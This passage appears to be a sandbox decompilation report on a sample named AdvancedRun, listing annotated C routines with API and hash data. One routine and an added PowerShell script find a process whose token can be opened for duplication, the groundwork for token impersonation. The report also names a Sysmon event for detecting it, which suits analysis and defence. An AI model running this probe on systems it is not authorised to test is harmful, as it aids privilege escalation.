			   that account; returns 0 if none qualifies. The token is only probed here, not duplicated. */
			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);          /* 0x200-byte wide-string buffer for the owner name */
				E004095FD(_t52, _t60,  &_v72);      /* process list via CreateToolhelp32Snapshot / Process32FirstW / Process32NextW (see subcalls) */
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {                     /* _v20: number of processes found */
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);            /* entry i; *_t57 is its PID */
						if(E00409A94( *_t57,  &_v584) == 0) {      /* owner name of the PID; subcalls show OpenProcess(PROCESS_QUERY_INFORMATION) + GetTokenInformation */
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();                            /* _wcsicmp(_a4, owner) at 004059FA */
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);   /* 0x2000000 = MAXIMUM_ALLOWED */
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {   /* 2 = TOKEN_DUPLICATE */
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;                          /* first usable PID wins */
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);               /* 0x5c = '\\': owner is "DOMAIN\user" */
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[1]);                       /* user part after the backslash; the decompiler showed &(_t42[0]) */
									_push(_t43);
									_push(_a4);
									L0040B278();                            /* _wcsicmp(_a4, user) at 00405A20 */
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);                  /* release the process list */
				return _t56;
			}

                                                                  0x0040598b
                                                                  0x0040598b
                                                                  0x0040599a
                                                                  0x004059ae
                                                                  0x004059b5
                                                                  0x004059c1
                                                                  0x004059c6
                                                                  0x004059cb
                                                                  0x004059ce
                                                                  0x00405a7b
                                                                  0x00405a7b
                                                                  0x004059d4
                                                                  0x004059d4
                                                                  0x004059dc
                                                                  0x004059ee
                                                                  0x00000000
                                                                  0x004059f0
                                                                  0x004059f0
                                                                  0x004059f6
                                                                  0x004059f7
                                                                  0x004059fa
                                                                  0x00405a03
                                                                  0x00405a2b
                                                                  0x00405a2e
                                                                  0x00405a3c
                                                                  0x00405a40
                                                                  0x00000000
                                                                  0x00405a42
                                                                  0x00405a42
                                                                  0x00405a54
                                                                  0x00405a59
                                                                  0x00405a5a
                                                                  0x00405a5a
                                                                  0x00405a61
                                                                  0x00405a69
                                                                  0x00405a7f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a69
                                                                  0x00405a05
                                                                  0x00405a0e
                                                                  0x00405a17
                                                                  0x00000000
                                                                  0x00405a19
                                                                  0x00405a19
                                                                  0x00405a1c
                                                                  0x00405a1d
                                                                  0x00405a20
                                                                  0x00405a29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a29
                                                                  0x00405a17
                                                                  0x00405a03
                                                                  0x00000000
                                                                  0x00405a6b
                                                                  0x00405a6e
                                                                  0x00405a72
                                                                  0x00405a72
                                                                  0x00000000
                                                                  0x004059d4
                                                                  0x00405a81
                                                                  0x00405a84
                                                                  0x00405a8f

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                  • String ID:
                                                                  • API String ID: 768606695-0
                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
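
E0040598B above is the routine that picks a process owned by a given user and checks that its token can be opened for TOKEN_DUPLICATE, the usual first step before a token is duplicated and handed to CreateProcessAsUser / CreateProcessWithTokenW. The PowerShell script below is an added example written for this report, not code from the sample or its author; it performs the same walk on a live host so a tester or defender can see which processes would qualify from the current security context. The names TokenProbe and Find-TokenSourceProcess are this example's own, and it assumes an elevated shell because Get-Process -IncludeUserName needs one (the sample resolves owners itself through GetTokenInformation).

```powershell
# Added example: find the first process owned by a user whose token can be opened for TOKEN_DUPLICATE,
# mirroring E0040598B. TokenProbe and Find-TokenSourceProcess are names chosen for this example.
$sig = @'
using System;
using System.Runtime.InteropServices;
public static class TokenProbe {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
Add-Type -TypeDefinition $sig

function Find-TokenSourceProcess {
    param([Parameter(Mandatory)][string]$UserName)   # "user" or "DOMAIN\user"

    $MAXIMUM_ALLOWED = 0x02000000   # the access mask the sample passes to OpenProcess
    $TOKEN_DUPLICATE = 0x0002       # the access the sample requests from OpenProcessToken

    # -IncludeUserName requires an elevated shell; with SilentlyContinue an unelevated run simply yields nothing.
    foreach ($p in Get-Process -IncludeUserName -ErrorAction SilentlyContinue) {
        if (-not $p.UserName) { continue }          # owner unreadable: the sample skips such entries too
        $owner = $p.UserName
        $short = $owner.Split('\')[-1]              # the sample also compares the text after the backslash
        # PowerShell's -ne on strings is case-insensitive, matching the sample's _wcsicmp
        if ($owner -ne $UserName -and $short -ne $UserName) { continue }

        $hProc = [TokenProbe]::OpenProcess($MAXIMUM_ALLOWED, $false, $p.Id)
        if ($hProc -eq [IntPtr]::Zero) { continue }
        $hTok = [IntPtr]::Zero
        $ok = [TokenProbe]::OpenProcessToken($hProc, $TOKEN_DUPLICATE, [ref]$hTok)
        if ($ok) { [void][TokenProbe]::CloseHandle($hTok) }   # probe only; nothing is duplicated
        [void][TokenProbe]::CloseHandle($hProc)
        if ($ok) { return [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName; Owner = $owner } }
    }
    return $null   # the sample returns PID 0 when nothing qualifies
}

# Usage: which process could serve as a token source for the current user?
Find-TokenSourceProcess -UserName $env:USERNAME
```

Run from a non-administrative context this normally finds only the caller's own processes; reaching another account's token needs ownership of that process or SeDebugPrivilege, which is the least-privilege boundary the sample's "run as user of process" logic relies on crossing. The OpenProcess calls it makes are the cross-process opens that Sysmon Event ID 10 (ProcessAccess) records, which is where a detection for this pattern would look.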

                                                                  C-Code - Quality: 64%
			/* Emits one HTML table row of the report (<tr> followed by one <td> per visible column) through
			   E00407343; _a4 is the output target, _a8 the item whose cell values are rendered. */
			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				/* Two inline wide-string template copies (rep movsd + movsw: 26 and 19 wchars); the decompiler
				   shows the second as a zero-length memcpy followed by asm("movsw"). */
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {                      /* +0x2c: number of visible columns */
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);     /* +0x30: visible-to-real column index table */
						_v8 = _t55;
						_t57 =  &_v160;                                         /* default: nowrap template */
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {   /* per-column flag selects the plain template */
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);   /* virtual call fills _v28 for this cell */
						E0040ADC0(_v28,  &_v108);                                 /* _v108 becomes the bgcolor=#%s argument */
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);  /* virtual call: cell text into the buffer at +0x64 */
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");                               /* keep empty or blank cells from collapsing */
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();                                    /* _snwprintf-style: (buf at +0x60, 0x2000, template, color, text) */
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscat
                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                  • API String ID: 384018552-4153097237
                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 42%
                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                  				struct tagMENUITEMINFOW _v0;
                                                                  				int _t24;
                                                                  				wchar_t* _t30;
                                                                  				intOrPtr _t32;
                                                                  				int _t34;
                                                                  				int _t42;
                                                                  				signed int _t47;
                                                                  				signed int _t48;
                                                                  
                                                                  				_t36 = __ecx;
                                                                  				_t48 = _t47 & 0xfffffff8;
                                                                  				E0040B550(0x203c, __ecx);
                                                                  				_t24 = GetMenuItemCount(_a8);
                                                                  				_t34 = _t24;
                                                                  				_t42 = 0;
                                                                  				if(_t34 <= 0) {
                                                                  					L13:
                                                                  					return _t24;
                                                                  				} else {
                                                                  					goto L1;
                                                                  				}
                                                                  				do {
                                                                  					L1:
                                                                  					memset( &_a50, 0, 0x2000);
                                                                  					_t48 = _t48 + 0xc;
                                                                  					_a36 =  &_a48;
                                                                  					_v0.cbSize = 0x30;
                                                                  					_a4 = 0x36;
                                                                  					_a40 = 0x1000;
                                                                  					_a16 = 0;
                                                                  					_a48 = 0;
                                                                  					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                  					if(_t24 == 0) {
                                                                  						goto L12;
                                                                  					}
                                                                  					if(_a48 == 0) {
                                                                  						L10:
                                                                  						_t56 = _a20;
                                                                  						if(_a20 != 0) {
                                                                  							_push(0);
                                                                  							_push(_a20);
                                                                  							_push(_a4);
                                                                  							_t24 = E0040605E(_t36, _t56);
                                                                  							_t48 = _t48 + 0xc;
                                                                  						}
                                                                  						goto L12;
                                                                  					}
                                                                  					_t30 = wcschr( &_a48, 9);
                                                                  					if(_t30 != 0) {
                                                                  						 *_t30 = 0;
                                                                  					}
                                                                  					_t31 = _a16;
                                                                  					if(_a20 != 0) {
                                                                  						if(_a12 == 0) {
                                                                  							 *0x40fe20 =  *0x40fe20 + 1;
                                                                  							_t32 =  *0x40fe20; // 0x0
                                                                  							_t31 = _t32 + 0x11558;
                                                                  							__eflags = _t32 + 0x11558;
                                                                  						} else {
                                                                  							_t17 = _t42 + 0x11171; // 0x11171
                                                                  							_t31 = _t17;
                                                                  						}
                                                                  					}
                                                                  					_t24 = E00406025(_t31,  &_a48);
                                                                  					_pop(_t36);
                                                                  					goto L10;
                                                                  					L12:
                                                                  					_t42 = _t42 + 1;
                                                                  				} while (_t42 < _t34);
                                                                  				goto L13;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                  • String ID: 0$6
                                                                  • API String ID: 2029023288-3849865405
                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E00402BEE(void* __ebx) {
                                                                  				int _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				int _v24;
                                                                  				int _v28;
                                                                  				void* _t27;
                                                                  				int _t31;
                                                                  				void* _t34;
                                                                  				int _t37;
                                                                  				int _t38;
                                                                  				int _t41;
                                                                  				int _t50;
                                                                  
                                                                  				_t34 = __ebx;
                                                                  				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                  					return _t27;
                                                                  				} else {
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					_v8 = GetSystemMetrics(0x4e);
                                                                  					_v12 = GetSystemMetrics(0x4f);
                                                                  					_t41 = GetSystemMetrics(0x4c);
                                                                  					_t31 = GetSystemMetrics(0x4d);
                                                                  					if(_v8 == 0 || _v12 == 0) {
                                                                  						_v8 = GetSystemMetrics(0);
                                                                  						_v12 = GetSystemMetrics(1);
                                                                  						_t41 = 0;
                                                                  						_t31 = 0;
                                                                  					} else {
                                                                  						_v8 = _v8 + _t41;
                                                                  						_v12 = _v12 + _t31;
                                                                  					}
                                                                  					_t50 = _v20 - _v28;
                                                                  					if(_t50 > 0x14) {
                                                                  						_t38 = _v24;
                                                                  						_t37 = _v16 - _t38;
                                                                  						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                  							_t31 = _t31 + 0xfffffff6;
                                                                  							if(_t38 >= _t31) {
                                                                  								_t31 = _v28;
                                                                  								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                  									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					return _t31;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window
                                                                  • String ID:
                                                                  • API String ID: 1155976603-0
                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004036D5(void* __edi, void* __eflags) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				char* _v24;
                                                                  				char _v28;
                                                                  				char* _v48;
                                                                  				intOrPtr _v56;
                                                                  				intOrPtr _v60;
                                                                  				int _v64;
                                                                  				int _v72;
                                                                  				intOrPtr _v76;
                                                                  				wchar_t* _v80;
                                                                  				intOrPtr _v84;
                                                                  				int _v92;
                                                                  				char* _v96;
                                                                  				intOrPtr _v104;
                                                                  				struct tagOFNA _v108;
                                                                  				void _v634;
                                                                  				long _v636;
                                                                  				void _v2682;
                                                                  				char _v2684;
                                                                  				void* __ebx;
                                                                  				char _t37;
                                                                  				intOrPtr _t38;
                                                                  				int _t46;
                                                                  				signed short _t54;
                                                                  
                                                                  				_v636 = 0;
                                                                  				memset( &_v634, 0, 0x208);
                                                                  				_v2684 = 0;
                                                                  				memset( &_v2682, 0, 0x7fe);
                                                                  				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                  				_v12 = _t37;
                                                                  				_t38 =  *0x40cbf0; // 0x67
                                                                  				_v8 = _t38;
                                                                  				_v28 = E00405B81(0x227);
                                                                  				_v24 = L"*.cfg";
                                                                  				_v20 = E00405B81(0x228);
                                                                  				_v16 = L"*.*";
                                                                  				E00405236( &_v2684,  &_v28);
                                                                  				_t54 = 0xa;
                                                                  				_v60 = E00405B81(_t54);
                                                                  				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                  				_v48 =  &_v12;
                                                                  				_v96 =  &_v2684;
                                                                  				_v108 = 0x4c;
                                                                  				_v92 = 0;
                                                                  				_v84 = 1;
                                                                  				_v80 =  &_v636;
                                                                  				_v76 = 0x104;
                                                                  				_v72 = 0;
                                                                  				_v64 = 0;
                                                                  				_v56 = 0x80806;
                                                                  				_t46 = GetSaveFileNameW( &_v108);
                                                                  				if(_t46 != 0) {
                                                                  					wcscpy( &_v636, _v80);
                                                                  					return E0040365E(__edi, 1,  &_v636);
                                                                  				}
                                                                  				return _t46;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004036F6
                                                                  • memset.MSVCRT ref: 00403712
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                  Similarity
                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                  • String ID: L$cfg
                                                                  • API String ID: 275899518-3734058911
                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                  				struct _SYSTEMTIME _v20;
                                                                  				long _v276;
                                                                  				long _v532;
                                                                  				FILETIME* _t15;
                                                                  
                                                                  				_t15 = __eax;
                                                                  				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                  					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                  						goto L5;
                                                                  					} else {
                                                                  						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                  						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                  						wcscpy(_a4,  &_v276);
                                                                  						wcscat(_a4, " ");
                                                                  						wcscat(_a4,  &_v532);
                                                                  					}
                                                                  				} else {
                                                                  					L5:
                                                                  					wcscpy(_a4, 0x40c4e8);
                                                                  				}
                                                                  				return _a4;
                                                                  			}

                                                                  APIs
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                  Similarity
                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                  • String ID:
                                                                  • API String ID: 1331804452-0
                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 71%
                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                  				void _v514;
                                                                  				long _v516;
                                                                  				wchar_t* _t34;
                                                                  				signed int _t35;
                                                                  				void* _t36;
                                                                  				void* _t37;
                                                                  
                                                                  				_t34 = __edi;
                                                                  				_v516 = _v516 & 0x00000000;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				 *__edi =  *__edi & 0x00000000;
                                                                  				_t37 = _t36 + 0xc;
                                                                  				_t35 = 0;
                                                                  				do {
                                                                  					_push( *(_t35 + _a4) & 0x000000ff);
                                                                  					_push(L"%2.2X");
                                                                  					_push(0xff);
                                                                  					_push( &_v516);
                                                                  					L0040B1EC();
                                                                  					_t37 = _t37 + 0x10;
                                                                  					if(_t35 > 0) {
                                                                  						wcscat(_t34, " ");
                                                                  					}
                                                                  					if(_a8 > 0) {
                                                                  						asm("cdq");
                                                                  						if(_t35 % _a8 == 0) {
                                                                  							wcscat(_t34, L"  ");
                                                                  						}
                                                                  					}
                                                                  					wcscat(_t34,  &_v516);
                                                                  					_t35 = _t35 + 1;
                                                                  				} while (_t35 < 0x80);
                                                                  				return _t34;
                                                                  			}

